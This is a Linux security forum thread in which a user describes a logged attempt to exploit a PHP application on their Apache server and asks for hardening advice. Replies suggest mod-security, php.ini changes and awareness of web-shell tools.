Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Introduction to Linux - A Hands on Guide
This guide was created as an overview of the Linux Operating System, geared toward new users as an exploration tour and getting started guide, with exercises at the end of each chapter.
For more advanced trainees it can be a desktop reference, and a collection of the base knowledge needed to proceed with system and network administration. This book contains many real life examples derived from the author's experience as a Linux system and network administrator, trainer and consultant. They hope these examples will help you to get a better understanding of the Linux system and that you feel encouraged to try out things on your own.
Click Here to receive this Complete Guide absolutely free.
Correct me if I'm wrong, but I believe they are trying to copy a file "cm" to my computer, overwrite index.php, and remove any evidence. Then they are emailing info about my system to a couple yahoo email addresses.
This command is repeated for a bunch of sub-directories all looking for index.php.
None of the subdirectories they looked for exist, and there is no index.php in the main directory, so I do't think any files were overwritten.
There is nothing important on this computer, so if I have been compromised, re-installing is not a problem, but I would rather learn from this and tighten security, and try to track down anything else that may have happened.
So I have a few questions. Some of these might be very simple.
How can I disable mail so they could not email themselves?
Was something actually executed on my computer?
Any links for how php can be exploited to let a command be executed on a remote computer?
What settings should I change for php, mysql, or apache to help stop these explots?
The 404 indicates that the vulnerable application (mambo) is not installed on your system. Interestingly, you can get the hackers email addresses (two yahoo accounts) from the data they sent you. I doubt you'd be able to get anything done, however.
The gentleman (caca) is well lnown to me. My suggestion is to look at implementing mod-security and the common rules on your apache server if you are using php based apps. There are also modifications that should be made to php.ini such as turning globals off. You can view the code for the exploit by using the address before the "&cmd". He isn't trying to upload the app to your system. The code from this page is probing your system to find weaknesses in your system security.
Whilst there may not be anything important on your server you might find that your system is "acquired" by a hacker and applications such as IRC software is installed and a group then starts using your system as a meeting place. The most important thing is ensure that he doesn't get access to /.
How would someone be able to gain access to / since apache's root directory is /var/www ?
There are certain scripts around such as r57 which will enable the hacker to explore your whole file system if you have any vulnerable php applications on your site. I have personal experience of this. It is then possible for them, using the same tool, to upload files to your server under the ownership of your apache user (www-data or nobody). Take a look at two screen captures of this tool in action before I implemented mod-security on my server, with a vulnerable app, here and here.